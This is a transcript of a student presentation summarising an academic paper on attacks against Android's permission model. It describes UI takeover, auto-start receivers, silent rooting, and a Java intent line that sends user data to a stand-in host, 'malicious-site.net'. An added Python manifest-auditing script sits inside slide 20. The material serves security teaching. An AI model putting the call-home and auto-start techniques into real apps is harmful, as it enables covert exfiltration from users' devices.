Messing with Android's Permission Model - PowerPoint Presentation

Uploaded by alexa-scheidler on 2016-05-30 (417 views)


Source: 2012 IEEE 11th International Conference on Trust, Security and Privacy in Computing and Communications. Authors: André Egners, Ulrike Meyer, Björn Marschollek. ID: 341351




Presentation Transcript

Slide 1

Messing with Android's Permission Model

Source: 2012 IEEE 11th International Conference on Trust, Security and Privacy in Computing and Communications

Authors: André Egners, Ulrike Meyer, Björn Marschollek

Group members: 9720114 王人弘, 9820117 陳冠謀, 9862218 盧軒偉

Slide 2

Outline

Introduction
Related work
Overview on Android
Android's permission model
Attacks
UI takeover
Starting Applications after Installation
Starting Applications at Boot
E.T. Calling Home
Silently Rooting Android
Conclusion

Slide 3

I. INTRODUCTION

When installing an app on a mobile device, a dialog usually pops up asking the user either to accept the permissions the program requests or to abort the installation. Users do not really know what risks the permissions they grant may create. In the design of the permission model, the available choices are too coarse-grained and too inflexible, which makes it easy for an attacker to get around the permission model's controls. This presentation introduces Android's permission model and several attacks on it.

Slide 4

II. RELATED WORK

Botnets
Inter-application communication
Permissions of Android apps
Other topics on security mechanisms and system vulnerabilities

Slide 5

III. OVERVIEW ON ANDROID

Based on the 2.6 Linux kernel
Combines the advantages of Linux (file and memory management) with the type safety of Java

Slide 6

III. OVERVIEW ON ANDROID (Cont.)

Slide 7

III. OVERVIEW ON ANDROID (Cont.)

The lowest layer is the Linux kernel, which provides process and memory management, the various device drivers, and so on, optimized for the needs of mobile devices. The second layer holds the libraries: the C library, 2D/3D graphics libraries, SQLite for structured data storage, and so on. Also in the second layer is what the Android runtime needs, mainly the Dalvik Virtual Machine, which is derived from the Java Virtual Machine and better suited to devices with limited resources.

Slide 8

III. OVERVIEW ON ANDROID (Cont.)

Application Framework Layer: provides the APIs used by application developers. It includes the Package Manager (tracks and manages applications and their data), the Location Manager (manages location for applications), the View System (UI and drawing), and so on. The top layer is where the applications live; third-party applications are in this layer and can use the frameworks and libraries below it.

Slide 9

IV. ANDROID'S PERMISSION MODEL

In API version 11, 116 different permissions are predefined.

Examples:
INTERNET – allows accessing the Internet
RECEIVE_SMS – for monitoring, recording, or processing incoming SMS
RECORD_AUDIO – for recording audio messages

Example: a Tetris game requesting Internet access is reasonable, but it would be suspicious if it also requested the permission to read the address book.

Slide 10

URI Permissions

Uniform Resource Identifier

Applications may wish to pass a URI to another application in order to exchange data. For example, an email application usually protects its emails from being read by other applications using additionally defined permissions. A third-party image viewer should not hold the permission to read emails directly; instead, the image viewer should be handed a URI to the data, with the Intent.FLAG_GRANT_READ_URI_PERMISSION flag set by the callee of the function. This enables the receiver, i.e., the image viewer, to read the data at the given URI.

Slide 11

Permission protection level

Level zero – normal permissions, low risk
e.g. setting a timer, making the phone vibrate
The user can request to be notified of the permission request prior to the installation of the application.

Level one – dangerous permissions, high risk
e.g. initiating phone calls, access to the device's sensors, the Internet, or sensitive user data, reading log files
Prior to the installation, the installer displays the set of requested dangerous permissions to the user, who decides to either grant or deny the set of permissions. Only if the user gives consent to all of the requested permissions can the application be installed.

Slide 12

Permission protection level (Cont.)

Level two – signature permissions
Granted only if the requesting application is signed with the same certificate as the application that declared the permission. Even if the user agrees, without the matching signature the permission cannot be granted.

Level three – signatureOrSystem
Granted only to applications that are in the Android system image or that are signed with the same certificates.

Slide 13

Permission protection level (Cont.)

Some flaws:
The user is only able to grant or deny all permissions at once.
Granting or denying a particular permission is not possible.
Users may refrain from installing an application which might be useful but requests too many or a suspicious set of permissions (the Tetris example).

Slide 14

Known Vulnerabilities

Log permissions
FAT32 formatted SD cards
WebKit browser
Most were uncovered in the past years

Slide 15

V. ATTACKS

Taking over the UI
Starting directly after installation
Also starting at boot
Two-way Internet communication
Silently rooting the device
An attack path to silently root Android

Slide 16

1. UI takeover

KeyInterceptor
- onKeyDown(): handle or pass
- handle them but do nothing

The Home button
- Return to the Home screen, or show a list of the recently used applications

Installing from Android Market
- The Install button -??-> The OK button

Slide 17

2. Starting Applications after Installation

Would the user start the app?

Receive the INSTALL_REFERRER intent
- Google Analytics SDK
- chosen by the attacker

Slide 18

2. Starting Applications after Installation (Cont.)

    <receiver android:name="com.google.android.apps.analytics.AnalyticsReceiver"
              android:exported="true">
        <intent-filter>
            <action android:name="com.android.vending.INSTALL_REFERRER"/>
        </intent-filter>
    </receiver>

Slide 19

3. Starting Applications at Boot

BOOT_COMPLETED intent

The permission RECEIVE_BOOT_COMPLETED was introduced to prevent applications from illegitimately starting at system boot... but the check is forgotten: the application successfully listens for the intent without asking for the permission.

Slide 20
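The following is an added defender-side check, not code from the paper or from this presentation. It parses an AndroidManifest.xml and flags the two auto-start paths described on slides 18 and 19 (an INSTALL_REFERRER receiver, and a BOOT_COMPLETED receiver that does not declare RECEIVE_BOOT_COMPLETED, which the slides say the OS does not enforce), exported receivers, and the suspicious INTERNET plus address-book pair from the Tetris example on slide 9. The sample manifest and the receiver class names in it are constructed for the example.

```python
import xml.etree.ElementTree as ET

NS = "{http://schemas.android.com/apk/res/android}"
BOOT_ACTION = "android.intent.action.BOOT_COMPLETED"
BOOT_PERMISSION = "android.permission.RECEIVE_BOOT_COMPLETED"
# Intent actions that let an app run without the user ever launching it.
AUTOSTART_ACTIONS = {
    "com.android.vending.INSTALL_REFERRER": "runs right after installation",
    BOOT_ACTION: "runs at every boot",
}

# Constructed sample manifest (not from the paper): INTERNET plus READ_CONTACTS,
# an INSTALL_REFERRER receiver, and a BOOT_COMPLETED receiver with no permission.
SAMPLE_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.example.tetris">
  <uses-permission android:name="android.permission.INTERNET"/>
  <uses-permission android:name="android.permission.READ_CONTACTS"/>
  <application>
    <receiver android:name=".ReferrerReceiver" android:exported="true">
      <intent-filter>
        <action android:name="com.android.vending.INSTALL_REFERRER"/>
      </intent-filter>
    </receiver>
    <receiver android:name=".BootReceiver">
      <intent-filter>
        <action android:name="android.intent.action.BOOT_COMPLETED"/>
      </intent-filter>
    </receiver>
  </application>
</manifest>"""

def audit_manifest(xml_text):
    """Return a list of human-readable findings for an AndroidManifest.xml."""
    root = ET.fromstring(xml_text)
    perms = {e.get(NS + "name") for e in root.iter("uses-permission")}
    findings = []
    for rcv in root.iter("receiver"):
        rcv_name = rcv.get(NS + "name")
        actions = {a.get(NS + "name") for a in rcv.iter("action")}
        for action in sorted(actions & set(AUTOSTART_ACTIONS)):
            findings.append("%s: %s (%s)" % (rcv_name, AUTOSTART_ACTIONS[action], action))
        # The slides say the OS does not enforce RECEIVE_BOOT_COMPLETED, so flag it here.
        if BOOT_ACTION in actions and BOOT_PERMISSION not in perms:
            findings.append("%s: listens for BOOT_COMPLETED without %s" % (rcv_name, BOOT_PERMISSION))
        if rcv.get(NS + "exported") == "true":
            findings.append("%s: exported receiver, reachable by other apps" % rcv_name)
    # The Tetris example from slide 9: Internet plus address book is a suspicious pair.
    if {"android.permission.INTERNET", "android.permission.READ_CONTACTS"} <= perms:
        findings.append("requests both INTERNET and READ_CONTACTS")
    return findings
```

Running `audit_manifest(SAMPLE_MANIFEST)` yields five findings for the constructed manifest; a manifest with no receivers and no permissions yields none.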

4. E.T. Calling Home

Establishing bidirectional outside communication, e.g. with a specified dropzone delivering user data, or with the command & control server of a botnet

VIEW intent:

    startActivity(new Intent(Intent.ACTION_VIEW, Uri.parse("http://malicious-site.net"))
            .setFlags(Intent.FLAG_ACTIVITY_NEW_TASK));

Slide 21

4. E.T. Calling Home (Cont.)

Request: HTTP GET to send data
URI schemes: deliver data to applications

SilentCommunicator
- screen off: start the transmission
- screen on: hide the browser

Slide 22

5. Silently Rooting Android

Modified zimperlich jailbreak: each instance runs with root privileges

The setuid() calls, which are intended to change the owner to the user ID assigned to the calling application -> fail

Infinite loop which executes the native code until an exception occurs

The root user can install apps and the device owner will not notice!

Slide 23

VI. CONCLUSION

This paper presents several vulnerabilities in Android's permission model. Attackers can exploit them to covertly establish a bidirectional channel and download additional attacks, and can use permission requests that arouse no suspicion to carry out more complex attacks.